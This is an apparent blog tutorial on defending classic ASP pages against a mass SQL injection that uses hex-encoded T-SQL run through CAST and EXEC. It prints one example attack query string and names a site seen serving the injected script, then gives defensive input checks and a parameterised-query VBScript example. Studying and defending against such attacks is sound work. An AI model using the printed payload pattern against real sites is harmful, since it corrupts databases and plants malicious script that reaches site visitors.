SQL Injection attack if you see in page view source http://116jurist.ru
On a classic ASP website, attackers use the following technique to perform SQL injection, and it is very simple. They append hex-encoded T-SQL to the query string; when the page reads the value from the query string and concatenates it into a database query, the injected statement executes on the database server and corrupts the database (the payload below, for example, rewrites content so that every page ends up serving a script tag pointing at the attacker's site).

This is one example of a string used in such an attack; an attacker can build any payload in the same way, since the hex blob is simply the injected SQL encoded byte by byte and decoded with CAST before EXEC runs it.

youpage.asp?id=101+declare+@s+varchar(8000)+set+@s=cast(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(8000))+exec(@s)--

So please make a few changes to prevent this problem; these checks are basic and necessary in all code.

1) Check the length and the type of the query string value before it reaches the database query, and pass it on only if it matches the minimal form the page expects from the query string.

Like yourpage.asp?id=101&name=infoA2Z

Then add the check:

If Len(Request.QueryString("id")) < 10 Then
    ' run the query
Else
    Response.Redirect "homepage.asp"
End If

In this case the query executes only if the length is less than 10; otherwise the page moves to the home page. This stops the long hex payload shown above, but a length limit on its own does not rule out SQL injection: a short payload such as 1 or 1=1 still fits, so also require that id contains only digits before using it (IsNumeric is not sufficient for this, because it also accepts forms such as "1e3" and "&H1F"). Prefer Request.QueryString("id") over Request("id"), which also searches form fields and cookies.

2) Use Replace to double any single quotes: id = Replace(id, "'", "''")

This only protects values that the SQL statement itself wraps in single quotes. The payload above contains no quote at all, because id is concatenated as a bare number, so Replace would not have stopped it. The reliable fix is to stop building SQL text out of request values altogether and pass them as typed parameters through an ADODB.Command, so the database never interprets the value as SQL.
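The following classic ASP (VBScript) handler is an added example and not code from the original page: it applies a strict digits-only check to the id value and then runs the lookup with a typed parameter instead of string concatenation. The table name Articles, its id and title columns, and the connection string are assumptions made for illustration only.

```vbscript
<%
Option Explicit
' Added example (assumed schema: table Articles with integer id and varchar title;
' assumed connection string; adjust both for your site).
Const CONN_STRING = "Provider=SQLOLEDB;Data Source=.;Initial Catalog=Site;Integrated Security=SSPI"

' Returns True only for a non-empty string of at most 9 ASCII digits.
' IsNumeric is deliberately not used: it accepts "1e3" and "&H1F".
Function IsValidId(s)
    Dim i
    IsValidId = False
    If Len(s) = 0 Or Len(s) > 9 Then Exit Function
    For i = 1 To Len(s)
        If InStr("0123456789", Mid(s, i, 1)) = 0 Then Exit Function
    Next
    IsValidId = True
End Function

Dim rawId
rawId = Request.QueryString("id")   ' QueryString only, not Request("id")

If Not IsValidId(rawId) Then
    ' "101 declare @s varchar(8000) ... exec(@s)--" fails this check and never reaches SQL.
    Response.Redirect "homepage.asp"
End If

' Vulnerable form, kept here as a comment for comparison; this is what the
' injected string exploits, because the request value becomes part of the SQL text:
'   sql = "SELECT title FROM Articles WHERE id = " & rawId
'   Set rs = conn.Execute(sql)

' Hardened form: the value travels as an integer parameter, never as SQL text.
Dim conn, cmd, rs
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open CONN_STRING

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "SELECT title FROM Articles WHERE id = ?"
cmd.CommandType = 1   ' adCmdText
' CreateParameter(Name, Type, Direction, Size, Value): 3 = adInteger, 1 = adParamInput
cmd.Parameters.Append cmd.CreateParameter("@id", 3, 1, 4, CLng(rawId))

Set rs = cmd.Execute
If Not rs.EOF Then
    ' Encode on output as well, so stored content cannot inject script into the page.
    Response.Write Server.HTMLEncode(rs("title"))
End If
rs.Close
conn.Close
%>
```

Even with the digits-only check in place, the parameterised command is what makes the page safe: the check limits what the value can look like, while the parameter guarantees that whatever it looks like, SQL Server treats it as data rather than as part of the statement.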

 
